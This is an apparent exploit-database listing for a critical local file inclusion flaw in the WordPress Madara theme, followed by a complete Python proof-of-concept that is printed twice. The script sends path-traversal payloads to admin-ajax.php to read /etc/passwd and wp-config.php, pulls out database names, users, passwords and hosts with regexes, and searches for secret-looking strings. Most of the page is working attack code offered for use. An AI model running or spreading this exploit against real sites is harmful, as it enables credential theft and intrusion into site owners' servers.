9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This Python script exploits a local file inclusion vulnerability in the WordPress Madara theme. It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data. It...
Basic Information
ID
PACKETSTORM:220776
Published
May 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : WordPress Madera 2.2.2 Local File Inclusion Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://mangabooth.com/product/wp-manga-theme-madara/ |
==================================================================================================================================
[+] Summary : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme.
It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
[+] POC :
import requests
import sys
import re
class MadaraLFIExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
self.session = requests.Session()
def read_file(self, filepath):
"""
Reading a file via LFI filepath: The file path (e.g., /etc/passwd or ../../wp-config.php)
"""
payload = {
'action': 'madara_load_more',
'page': '1',
'template': f'plugins/../../../../../../..{filepath}',
'vars[orderby]': 'meta_value_num',
'vars[paged]': '1',
'vars[timerange]': '',
'vars[posts_per_page]': '16',
'vars[tax_query][relation]': 'OR',
'vars[meta_query][0][relation]': 'AND',
'vars[meta_query][relation]': 'AND',
'vars[post_type]': 'wp-manga',
'vars[post_status]': 'publish',
'vars[meta_key]': '_latest_update',
'vars[order]': 'desc',
'vars[sidebar]': 'right',
'vars[manga_archives_item_layout]': 'big_thumbnail'
}
headers = {
'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
}
try:
response = self.session.post(
self.ajax_url,
data=payload,
headers=headers,
timeout=10
)
if response.status_code == 200 and len(response.text) > 50:
return response.text
else:
return None
except Exception as e:
print(f"[-] Error: {e}")
return None
def read_config_file(self):
"""Read wp-config.php (contains database credentials)"""
paths = [
'/wp-config.php',
'/../wp-config.php',
'../../wp-config.php',
'../../../wp-config.php'
]
for path in paths:
print(f"[*] Trying: {path}")
content = self.read_file(path)
if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
print("[+] Found wp-config.php!")
db_patterns = {
'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
}
for key, pattern in db_patterns.items():
match = re.search(pattern, content)
if match:
print(f"[+] {key}: {match.group(1)}")
return content
return None
def find_indoushka(self):
"""Searching for indoushkas in popular files"""
common_files = [
'/indoushka.txt',
'/root/indoushka.txt',
'/home/indoushka/indoushka.txt',
'/var/www/indoushka.txt',
'/tmp/indoushka.txt',
'../../../indoushka.txt',
'../../../../indoushka.txt'
]
for filepath in common_files:
print(f"[*] Checking {filepath}")
content = self.read_file(filepath)
if content:
patterns = [
r'indoushka\{[^}]+\}',
r'indoushka\{[^}]+\}',
r'indoushka\{[^}]+\}',
r'\{FLG:[^}]+\}',
r'[A-Z0-9]{32,}',
r'[a-f0-9]{32,}'
]
for pattern in patterns:
matches = re.findall(pattern, content)
if matches:
print(f"[YEP] indoushka FOUND: {matches[0]}")
return matches[0]
print("[*] Trying to read sensitive WordPress files...")
wp_files = [
'/wp-config.php',
'/wp-content/plugins/madara/functions.php',
'/wp-content/themes/madara/style.css'
]
for wp_file in wp_files:
content = self.read_file(wp_file)
if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
print(f"[+] Interesting content in {wp_file}:")
print(content[:500])
return None
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
exploit = MadaraLFIExploit(target)
print("[*] Testing LFI vulnerability...")
test_content = exploit.read_file('/etc/passwd')
if test_content and 'root:' in test_content:
print("[+] LFI confirmed! /etc/passwd read successfully")
print("\n[*] Searching for indoushka...")
indoushka = exploit.find_indoushka()
if not indoushka:
print("[*] Trying to read database config...")
exploit.read_config_file()
else:
print("[-] LFI might not work. Trying alternative payload...")
test_content = exploit.read_file('../../../wp-config.php')
if test_content and 'DB_NAME' in test_content:
print("[+] LFI confirmed via wp-config.php!")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : WordPress Madera 2.2.2 Local File Inclusion Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://mangabooth.com/product/wp-manga-theme-madara/ |
==================================================================================================================================
[+] Summary : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme.
It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
[+] POC :
import requests
import sys
import re
class MadaraLFIExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
self.session = requests.Session()
def read_file(self, filepath):
"""
Reading a file via LFI filepath: The file path (e.g., /etc/passwd or ../../wp-config.php)
"""
payload = {
'action': 'madara_load_more',
'page': '1',
'template': f'plugins/../../../../../../..{filepath}',
'vars[orderby]': 'meta_value_num',
'vars[paged]': '1',
'vars[timerange]': '',
'vars[posts_per_page]': '16',
'vars[tax_query][relation]': 'OR',
'vars[meta_query][0][relation]': 'AND',
'vars[meta_query][relation]': 'AND',
'vars[post_type]': 'wp-manga',
'vars[post_status]': 'publish',
'vars[meta_key]': '_latest_update',
'vars[order]': 'desc',
'vars[sidebar]': 'right',
'vars[manga_archives_item_layout]': 'big_thumbnail'
}
headers = {
'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
}
try:
response = self.session.post(
self.ajax_url,
data=payload,
headers=headers,
timeout=10
)
if response.status_code == 200 and len(response.text) > 50:
return response.text
else:
return None
except Exception as e:
print(f"[-] Error: {e}")
return None
def read_config_file(self):
"""Read wp-config.php (contains database credentials)"""
paths = [
'/wp-config.php',
'/../wp-config.php',
'../../wp-config.php',
'../../../wp-config.php'
]
for path in paths:
print(f"[*] Trying: {path}")
content = self.read_file(path)
if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
print("[+] Found wp-config.php!")
db_patterns = {
'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
}
for key, pattern in db_patterns.items():
match = re.search(pattern, content)
if match:
print(f"[+] {key}: {match.group(1)}")
return content
return None
def find_indoushka(self):
"""Searching for indoushkas in popular files"""
common_files = [
'/indoushka.txt',
'/root/indoushka.txt',
'/home/indoushka/indoushka.txt',
'/var/www/indoushka.txt',
'/tmp/indoushka.txt',
'../../../indoushka.txt',
'../../../../indoushka.txt'
]
for filepath in common_files:
print(f"[*] Checking {filepath}")
content = self.read_file(filepath)
if content:
patterns = [
r'indoushka\{[^}]+\}',
r'indoushka\{[^}]+\}',
r'indoushka\{[^}]+\}',
r'\{FLG:[^}]+\}',
r'[A-Z0-9]{32,}',
r'[a-f0-9]{32,}'
]
for pattern in patterns:
matches = re.findall(pattern, content)
if matches:
print(f"[YEP] indoushka FOUND: {matches[0]}")
return matches[0]
print("[*] Trying to read sensitive WordPress files...")
wp_files = [
'/wp-config.php',
'/wp-content/plugins/madara/functions.php',
'/wp-content/themes/madara/style.css'
]
for wp_file in wp_files:
content = self.read_file(wp_file)
if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
print(f"[+] Interesting content in {wp_file}:")
print(content[:500])
return None
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
exploit = MadaraLFIExploit(target)
print("[*] Testing LFI vulnerability...")
test_content = exploit.read_file('/etc/passwd')
if test_content and 'root:' in test_content:
print("[+] LFI confirmed! /etc/passwd read successfully")
print("\n[*] Searching for indoushka...")
indoushka = exploit.find_indoushka()
if not indoushka:
print("[*] Trying to read database config...")
exploit.read_config_file()
else:
print("[-] LFI might not work. Trying alternative payload...")
test_content = exploit.read_file('../../../wp-config.php')
if test_content and 'DB_NAME' in test_content:
print("[+] LFI confirmed via wp-config.php!")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================